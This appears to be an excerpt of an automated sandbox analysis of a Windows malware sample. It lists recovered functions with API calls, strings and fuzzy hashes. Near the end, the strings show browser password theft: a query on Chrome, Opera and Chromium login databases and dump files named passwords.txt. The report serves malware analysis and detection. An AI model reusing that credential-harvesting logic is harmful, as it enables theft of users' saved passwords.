__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004AB5B7
__allrem.LIBCMT ref: 004AB5CE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004AB5EC

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 86d55374da325853019a49478a7aee861dfee5d1b75086895d3d5193f8e5c8c3
Instruction ID: c61bf567208f48c9b7298072033b90e3c4e580b0b59e2b884b34ffbe997fcddb
Opcode Fuzzy Hash: 86d55374da325853019a49478a7aee861dfee5d1b75086895d3d5193f8e5c8c3
Instruction Fuzzy Hash: FB810B71A00705ABD7249E29CC41B9B73A8EF6A368F14862FF411D7383E778D90187D9

Uniqueness

Uniqueness Score: -1.00%

Function 0049DE60, Relevance: 9.1, APIs: 6, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,7519F9C0,?,?,?,0040A1A8), ref: 0049DE76
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0040A1A8), ref: 0049DE8A
CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0049DEBF
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0049DED5
CloseHandle.KERNEL32(?), ref: 0049DEE4
CloseHandle.KERNEL32(?,?,?,?,0040A1A8), ref: 0049DEED

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandle$MappingSizeView
String ID:
API String ID: 2246244431-0
Opcode ID: 209506585523a6ea177b1cf2bc6a30dbb4183ae1d12887e53bc282aef5737952
Instruction ID: 5606bc43c9b5fda7ab1d67939d9efb7f6a57bfa5477723a0473e64bd70f695ce
Opcode Fuzzy Hash: 209506585523a6ea177b1cf2bc6a30dbb4183ae1d12887e53bc282aef5737952
Instruction Fuzzy Hash: F7113374640702AFEB305F25DC1AF537BE4AF15710F548929F699A92E1E778E4408B18

Uniqueness

Uniqueness Score: -1.00%

Function 004B483A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004C40BC), ref: 004B48A4
_free.LIBCMT ref: 004B4892

Part of subcall function 004B0D6A: RtlFreeHeap.NTDLL(00000000,00000000,?,004B7C02,?,00000000,?,?,?,004B7C29,?,00000007,?,?,004B8059,?), ref: 004B0D80
Part of subcall function 004B0D6A: GetLastError.KERNEL32(?,?,004B7C02,?,00000000,?,?,?,004B7C29,?,00000007,?,?,004B8059,?,?), ref: 004B0D92

_free.LIBCMT ref: 004B4A5E

Strings

Pacific Daylight Time, xrefs: 004B4942
Pacific Standard Time, xrefs: 004B4913

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time
API String ID: 2155170405-1154798116
Opcode ID: eea61955d71df6ecf004fefa7cec4dcdbccd4096a12a321c94b3940f96ec510d
Instruction ID: 909c48fc4929bd3abe34aaec2717e1f56b0d2b8568e9bdfdee7e793cdfc32af6
Opcode Fuzzy Hash: eea61955d71df6ecf004fefa7cec4dcdbccd4096a12a321c94b3940f96ec510d
Instruction Fuzzy Hash: F95109B1900205ABCB24EF799C819EB77BCAF85354B10026FE450A7292E7789E41CB7D

Uniqueness

Uniqueness Score: -1.00%

Function 00405EA0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 135COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00405EA5

Part of subcall function 004A2257: std::invalid_argument::invalid_argument.LIBCONCRT ref: 004A2263

Strings

%Temp%\, xrefs: 00405EB1
string too long, xrefs: 00405EA0
5\@, xrefs: 00405EB6, 00405EB5, 00405F87, 00405FB7

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID: %Temp%\$5\@$string too long
API String ID: 1997705970-291094060
Opcode ID: 3928a873aa6c56358526f6830a9d77dfb5c6acd6a93a8370d13a184846dcf87a
Instruction ID: 77d8cd41b10a2bc00aed8ec4c299c263be83304d66df3f2f99ce92b18dc262e5
Opcode Fuzzy Hash: 3928a873aa6c56358526f6830a9d77dfb5c6acd6a93a8370d13a184846dcf87a
Instruction Fuzzy Hash: 2E3126B12007054FC724EF38D9C491BB799EB95310B240A3FF552D3382EB7DE8188A69

Uniqueness

Uniqueness Score: -1.00%

Function 00423B30, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,?), ref: 00423BFF

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 00423CA9
winRead, xrefs: 00423C78

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2738559852-1843600136
Opcode ID: ebd54d02ded7e0a138e9f389af90d9e8eb89b0003829c9a313c5bd66d75ca650
Instruction ID: 6fc47d4795a89b88490992c60176675c9eefab725c4d3e240602da24a159cc75
Opcode Fuzzy Hash: ebd54d02ded7e0a138e9f389af90d9e8eb89b0003829c9a313c5bd66d75ca650
Instruction Fuzzy Hash: E841D2723042109FC7149F5AED8582BB7B6EBC8701F94082FF980D3252D629EA448B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GdipDisposeImage.GDIPLUS(?), ref: 0040EE7C
GdipFree.GDIPLUS ref: 0040EE8F

Strings

p@, xrefs: 0040EE76

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Gdip$DisposeFreeImage
String ID: p@
API String ID: 1950503971-1482256116
Opcode ID: cd75c559c64b4d06dcf630c87ebf3f08cedd8c6db2bfdfb36355cea668492205
Instruction ID: 75a9f9c27f01be118366f28401921db5a0d451a21d563f9b7acce60209fbda51
Opcode Fuzzy Hash: cd75c559c64b4d06dcf630c87ebf3f08cedd8c6db2bfdfb36355cea668492205
Instruction Fuzzy Hash: 2CE0CD7530022157C6A01B08EC04FC777909F26755B04483FF985F1321C3795C6187DD

Uniqueness

Uniqueness Score: -1.00%

Function 004B9139, Relevance: 4.7, APIs: 3, Instructions: 177fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004B88CD: GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 004B8915

WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004A8196,00000020,?,00000000,00000000,00000000), ref: 004B928A
GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 004B9294
__dosmaperr.LIBCMT ref: 004B92D9

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID:
API String ID: 251514795-0
Opcode ID: fedaac1fb30318a765351004344e627007bc939b9f2aa9fa80d45ab911798f0f
Instruction ID: 63d49f2f42b84a632036ae2533f96e24f251de13874153b3dc5c848560d48e11
Opcode Fuzzy Hash: fedaac1fb30318a765351004344e627007bc939b9f2aa9fa80d45ab911798f0f
Instruction Fuzzy Hash: 7F51F471D0020AAFEF159FA9C885BEF7BB9EF0A304F040457E600A7262D6389D41D779

Uniqueness

Uniqueness Score: -1.00%

Function 004AF76C, Relevance: 4.6, APIs: 3, Instructions: 102COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004AF7FC
_free.LIBCMT ref: 004AF817
_free.LIBCMT ref: 004AF822

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 36566efcf63225c93c10fedf0da6fdf79649719553254f6a62325d4f7906bc7a
Instruction ID: e079a3ec95b7783b7dab9464e264ae54ceed5cfcd29d1d66454767c73cdc91f7
Opcode Fuzzy Hash: 36566efcf63225c93c10fedf0da6fdf79649719553254f6a62325d4f7906bc7a
Instruction Fuzzy Hash: F0217D765082006AEB14AFF9A841BFB7769DF97314F2401BFE8449B341E63E5D0A8668

Uniqueness

Uniqueness Score: -1.00%

Function 004B4995, Relevance: 4.6, APIs: 3, Instructions: 79COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004B4A08
_free.LIBCMT ref: 004B4A5E

Part of subcall function 004B483A: _free.LIBCMT ref: 004B4892
Part of subcall function 004B483A: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004C40BC), ref: 004B48A4

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 2a01514120a1c2def3f7ff3e36015bb7f3fda20e45b06cf85cf7a5d9ea4166a1
Instruction ID: ad36b472d8edb136b1a1e41b8ba2c29b18c15c70fe10f0bcc221a778cbdb353d
Opcode Fuzzy Hash: 2a01514120a1c2def3f7ff3e36015bb7f3fda20e45b06cf85cf7a5d9ea4166a1
Instruction Fuzzy Hash: 8A213B7180011497CB30A7369C45EEB736C8BD6724F11029FE494A6182EF7C5D8586BD

Uniqueness

Uniqueness Score: -1.00%

Function 004B0EBD, Relevance: 4.6, APIs: 3, Instructions: 61COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,00402D94,?,004B0DEB,00402D94,004D6990,0000000C,004B0E9D,004D67D0), ref: 004B0F13
GetLastError.KERNEL32(?,004B0DEB,00402D94,004D6990,0000000C,004B0E9D,004D67D0), ref: 004B0F1D
__dosmaperr.LIBCMT ref: 004B0F48

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: b479184d2b91433ab3ee3cce712409fa3b7a8a50b00509f1235948cd2942ac29
Instruction ID: 452b2c4e34fe9bab8cc2491c10b2cc93f36ef7f214a3453d177df582b5e460f7
Opcode Fuzzy Hash: b479184d2b91433ab3ee3cce712409fa3b7a8a50b00509f1235948cd2942ac29
Instruction Fuzzy Hash: AC016B3370911017E2311635A8867FF27498B86739F254A5FFA18972D2EA6CCC81417D

Uniqueness

Uniqueness Score: -1.00%

Function 004B4E7C, Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,004B4F29,00000000,00000000,00000002,00000000), ref: 004B4EB5
GetLastError.KERNEL32(?,004B4F29,00000000,00000000,00000002,00000000,?,004B91C2,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004B4EBF
__dosmaperr.LIBCMT ref: 004B4EC6

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 8d75e0eabdd601504e76543b28bcb05d94e4f41e1e6db7f38f37605326e8299a
Instruction ID: 3e0437b63c24c0c774f265b384a343fb612ef791d73231d8b2a9ff5edd1a7aef
Opcode Fuzzy Hash: 8d75e0eabdd601504e76543b28bcb05d94e4f41e1e6db7f38f37605326e8299a
Instruction Fuzzy Hash: 8101D8726105156BCB059F9ADC45CEF7B2AEFC5325724020AF811D72D1EB74DD428774

Uniqueness

Uniqueness Score: -1.00%

Function 004B69DF, Relevance: 4.5, APIs: 3, Instructions: 37COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004B69E3
_free.LIBCMT ref: 004B6A1C
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004B6A23

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentStrings$Free_free
String ID:
API String ID: 2716640707-0
Opcode ID: 92186ff566ae8a588ed07f598ac6202fe9ee6aea4be19a8607ba55586ec4da77
Instruction ID: dfef15abc6abc0395b4f59a76b18ac7002af8c061702ceba9bbeac3685bc84f7
Opcode Fuzzy Hash: 92186ff566ae8a588ed07f598ac6202fe9ee6aea4be19a8607ba55586ec4da77
Instruction Fuzzy Hash: FEE02B77204E102AD762263A7C49DEF194DEFCB7B976B022BF11952282EE1C8C0200FD

Uniqueness

Uniqueness Score: -1.00%

Function 004A1D10, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004A1E03

Strings

Wd8rvkermusech, xrefs: 004A1DA5

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: Wd8rvkermusech
API String ID: 823142352-2427855469
Opcode ID: edaa5e99ac8299e91c5e9ee421879111253ca48792b7c2fecb4dc04089da39da
Instruction ID: ce6da8d045224a877307989df82b9ff7233d846b0c2bca2a66aa260cb3c7a3ab
Opcode Fuzzy Hash: edaa5e99ac8299e91c5e9ee421879111253ca48792b7c2fecb4dc04089da39da
Instruction Fuzzy Hash: CE415EB05047409FE7308F15D908B17BBF0FB16B28F108A5EE5965BBD1C7BAA448CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00423AB0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?), ref: 00423AC2

Strings

winClose, xrefs: 00423B09

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID: winClose
API String ID: 2591292051-4219828513
Opcode ID: c23533994336c59bbeeeb2fb5e4362ae285a53a1534e9b954616eae31df594ed
Instruction ID: c491312855000458e7c0247bdc026ede9962ec019c64896a5c1c91a7c5a19886
Opcode Fuzzy Hash: c23533994336c59bbeeeb2fb5e4362ae285a53a1534e9b954616eae31df594ed
Instruction Fuzzy Hash: 41F0A4313011219BD7006F26FC05B6BBBB2BB44716F40843BF545C2190DFBDD8538698

Uniqueness

Uniqueness Score: -1.00%

Function 004B8E2B, Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000020,00000000,00000000,?,004B924E,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004B8ED5
GetLastError.KERNEL32(?,004B924E,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004A8196,00000020,?,00000000,00000000), ref: 004B8EFB

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 1d21fbf7e3725e14a19ad35d376f95206c72d197075c2752773bdc58bf392ad9
Instruction ID: ca2c8cbc9ccb48d29859a0d0d15e21a00519c46d3177ebf83bb66bcad4a50b04
Opcode Fuzzy Hash: 1d21fbf7e3725e14a19ad35d376f95206c72d197075c2752773bdc58bf392ad9
Instruction Fuzzy Hash: 55217331A002199FCB24CF19DD809E9B3B9EF49314B1444AFE909D7251DB34DD85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004B8D50, Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000020,00000000,00000000,?,004B926E,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004B8DEC
GetLastError.KERNEL32(?,004B926E,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004A8196,00000020,?,00000000,00000000), ref: 004B8E12

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: e29a419d4ca369f84edeb5130a2420e8d7de3b1a4dee1b29c03e080f73cdaec1
Instruction ID: 0689b6825bc6060bbef93a7d384cce39a36987015a825ca1fb8cc5c37543e206
Opcode Fuzzy Hash: e29a419d4ca369f84edeb5130a2420e8d7de3b1a4dee1b29c03e080f73cdaec1
Instruction Fuzzy Hash: 63218230A00119DBCB15DF19DD809E9B7B9EF59301F1440AFE906D7251DA34DE96CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004143E0, Relevance: 3.1, APIs: 2, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

SHFileOperationW.SHELL32(?), ref: 00414493
Sleep.KERNEL32(00000003), ref: 0041449B

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileOperationSleep
String ID:
API String ID: 2384180321-0
Opcode ID: 3f00cbfe6483d48341363702ef8d644005e71bdb58bf973a31fb3dd34a44c772
Instruction ID: 62ae0b00a59f9dc1ac799e461e9d81a0f54a809a023b237549b017df772f65e4
Opcode Fuzzy Hash: 3f00cbfe6483d48341363702ef8d644005e71bdb58bf973a31fb3dd34a44c772
Instruction Fuzzy Hash: 971190351143419BD720DF14C805BABB7F4BF88708F408A6EF598A3181F7789359C796

Uniqueness

Uniqueness Score: -1.00%

Function 004AF6CB, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004AF713

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5e72a6859e0481fa25f0a745da9b48f32d2b8f5fde076140ea3191d2830ac903
Instruction ID: 436051ccbe998d5f5017c906f1e8e4a4a20a6d4142bbffda21da5836bb03697e
Opcode Fuzzy Hash: 5e72a6859e0481fa25f0a745da9b48f32d2b8f5fde076140ea3191d2830ac903
Instruction Fuzzy Hash: 91E0652650251181A7227BBF6C022AB17559BA3736F12427BF424C61E1DF7C484B5A7F

Uniqueness

Uniqueness Score: -1.00%

Function 004B2AED, Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

__cftof.LIBCMT ref: 004B2BC3

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __cftof
String ID:
API String ID: 1622813385-0
Opcode ID: 5c581c55357d60261af91ffd783aac3975094efbf0e67985dcc5ba6c002fbafa
Instruction ID: cfd0673b9c7132e13c1bb93bbd1a7f7e3621081ea9779921239f5a099853f23f
Opcode Fuzzy Hash: 5c581c55357d60261af91ffd783aac3975094efbf0e67985dcc5ba6c002fbafa
Instruction Fuzzy Hash: 2C310A3250C0145E87296F399D46EFF7764DE45735B24021FF828AA2D1EEACE843967C

Uniqueness

Uniqueness Score: -1.00%

Function 004A0DA0, Relevance: 1.6, APIs: 1, Instructions: 69fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,004A0D93,?,?), ref: 004A0E19

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 2ae9d1aa64b054b6c7462172144e02b9febacbf798ebd63698235ad408326a98
Instruction ID: 39f447afbe86a4f9d5cf89f9f7672420c7e4c7c5806c4d574f9b5ce8381d8fd6
Opcode Fuzzy Hash: 2ae9d1aa64b054b6c7462172144e02b9febacbf798ebd63698235ad408326a98
Instruction Fuzzy Hash: 0B119D72700602AFE304DE25D8C0A57F7A8FBA5729F20852EE55983600DB35FC25DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004A8EE7, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

__cftof.LIBCMT ref: 004A8F29

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __cftof
String ID:
API String ID: 1622813385-0
Opcode ID: 1ba7df5804233c3207f79f5548d8af00199a8cf30899702d2935592f0a63377b
Instruction ID: 900c3c4971546588e781fd6557a7403ca123d56acd7dfeb6f5923c94370b1b9c
Opcode Fuzzy Hash: 1ba7df5804233c3207f79f5548d8af00199a8cf30899702d2935592f0a63377b
Instruction Fuzzy Hash: A121AE7150060AAED720DB51C981EBBB3F9FB25314B40092FF153D2551EB74FA09CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004B34C4, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004B34FE

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: eb25c172ca893cbf1939cf9d7530598f8c8ad9cb6ca5e7e0e6d2c4320d5e3cda
Instruction ID: a6469e69e2665680e4e710cba3d292ecbcebf0ad0a6b8b9d823883359e163a5b
Opcode Fuzzy Hash: eb25c172ca893cbf1939cf9d7530598f8c8ad9cb6ca5e7e0e6d2c4320d5e3cda
Instruction Fuzzy Hash: DB112A71A0410AAFCF09DF59E9419DB7BF4EF48304F05406AF809EB351D674EA21CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004A5B74, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 254a3f8da45007bcffe3cf794ef09ca228b44e844a0c877929b155dd64576239
Instruction ID: 32ed90b85dbb51d04290a0d15fd380d2f9ccca28ef38c69c216cdf295c773ebd
Opcode Fuzzy Hash: 254a3f8da45007bcffe3cf794ef09ca228b44e844a0c877929b155dd64576239
Instruction Fuzzy Hash: BCF0F932500A106AC731272B9D01A9B32599FA333AF10071BF564921D1CA7CF802C6BE

Uniqueness

Uniqueness Score: -1.00%

Function 004B5858, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004B202D,00000001,00000364,00000008,000000FF,?,?,?,?,?,004A953B,?), ref: 004B5899

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 33d6ae22278a6b90f69b463fe44661b6b0027d65ba60dfd7dd003fc3f1b5ce05
Instruction ID: ffa9b8b226f6d37df49a8d9498b2038194b7b5c5f203d99a82f7d7c756f222c8
Opcode Fuzzy Hash: 33d6ae22278a6b90f69b463fe44661b6b0027d65ba60dfd7dd003fc3f1b5ce05
Instruction Fuzzy Hash: 8DF0E931601920EBEF213A239C05BDBB74C9F91761B144037AC14D7290DB3CD86286FD

Uniqueness

Uniqueness Score: -1.00%

Function 004B1505, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,004B6494,00000220,?,?,?,?,?,?,004A60CF,00000000,?,?), ref: 004B1537

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e0163a768f5bcb079272775ca2f5ce8b648250fbfb94d398415593b1ff9499e4
Instruction ID: 29e3d04cddb98180296274b80edbb51b25c81050b2a3d606b6f72bcaaa56c6ba
Opcode Fuzzy Hash: e0163a768f5bcb079272775ca2f5ce8b648250fbfb94d398415593b1ff9499e4
Instruction Fuzzy Hash: 2AE0A031200231779F312A2AAC10BDB26488FC23A1B950033AC16922B0EA288E0191FD

Uniqueness

Uniqueness Score: -1.00%

Function 004BB596, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,004BB8F8,?,?,00000000,?,004BB8F8,00000000,0000000C), ref: 004BB5B3

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a8ea564c493aacf7cef54c4072617e803fbc18d31fcc7216989913bff426b3c0
Instruction ID: 9b8f83481ad0e479ee3d87938f0c5b11c2fc4047241eb3338e764592f9f17a31
Opcode Fuzzy Hash: a8ea564c493aacf7cef54c4072617e803fbc18d31fcc7216989913bff426b3c0
Instruction Fuzzy Hash: 6FD06C3200010DBFDF028F84DC06EDA3FAAFB4C754F054110BA1856020C736E821EB94

Uniqueness

Uniqueness Score: -1.00%

Function 004A9940, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004A9953

Part of subcall function 004B0D6A: RtlFreeHeap.NTDLL(00000000,00000000,?,004B7C02,?,00000000,?,?,?,004B7C29,?,00000007,?,?,004B8059,?), ref: 004B0D80
Part of subcall function 004B0D6A: GetLastError.KERNEL32(?,?,004B7C02,?,00000000,?,?,?,004B7C29,?,00000007,?,?,004B8059,?,?), ref: 004B0D92

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 30813fbe102492c53bb56d3107939da1c93a59bd43e372c9dc27790ff15c0a53
Instruction ID: c6d0338e520efe5ffaa1cafeffa026a786c2f8fa439ef48203bcc53a734a2e36
Opcode Fuzzy Hash: 30813fbe102492c53bb56d3107939da1c93a59bd43e372c9dc27790ff15c0a53
Instruction Fuzzy Hash: 26C08C31000208FBCB009B86C806A8E7BA8EB80368F200088F40417280CAB1EE009A90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00403600, Relevance: 40.6, APIs: 3, Strings: 20, Instructions: 334COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040366F

Strings

Browser: Google Chrome Profile 3, xrefs: 004039B9
Soft: Opera, xrefs: 004039DB
\_Files\_AllPasswords_list.txt, xrefs: 0040363B
%Temp%\, xrefs: 0040362B, 00403705
Browser: Google Chrome Profile 2, xrefs: 004039A2
Url: %s, xrefs: 00403A03
Password: %s, xrefs: 00403A23, 00403A5D
Soft: Google Chrome Profile 1, xrefs: 00403996
Site: %s, xrefs: 00403A3D
Soft: Google Chrome Profile 2, xrefs: 004039AD
\files_\passwords.txt, xrefs: 00403715
Soft: Google Chrome Profile 3, xrefs: 004039C4
Browser: Google Chrome Profile 1, xrefs: 0040398B
Browser: Opera, xrefs: 004039D0
Username: %s, xrefs: 00403A14, 00403A4E
Browser: Google Chrome, xrefs: 00403974
Soft: Chromium, xrefs: 004039F2
Soft: Google Chrome, xrefs: 0040397F
SELECT origin_url, username_value, password_value FROM logins, xrefs: 004037EC
Browser: Chromium, xrefs: 004039E7

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: %Temp%\$Browser: Chromium$Browser: Google Chrome$Browser: Google Chrome Profile 1$Browser: Google Chrome Profile 2$Browser: Google Chrome Profile 3$Browser: Opera$Password: %s$SELECT origin_url, username_value, password_value FROM logins$Site: %s$Soft: Chromium$Soft: Google Chrome$Soft: Google Chrome Profile 1$Soft: Google Chrome Profile 2$Soft: Google Chrome Profile 3$Soft: Opera$Url: %s$Username: %s$\_Files\_AllPasswords_list.txt$\files_\passwords.txt
API String ID: 237503144-3546853567
Opcode ID: e2a592f30ade588de3dec5d6c0b311e7b51d5a1be1d693285603b71624a297e3
Instruction ID: 8fe62f39530a7709c11e7d322dacc36636a1409c72f6ca9f151bd0b6b6359058
Opcode Fuzzy Hash: e2a592f30ade588de3dec5d6c0b311e7b51d5a1be1d693285603b71624a297e3
Instruction Fuzzy Hash: DCB12BB5E002046BDB10AF65DC82FAF7A69AF19309F14413FF401B72D2D77DAA018A5D

Uniqueness

Uniqueness Score: -1.00%

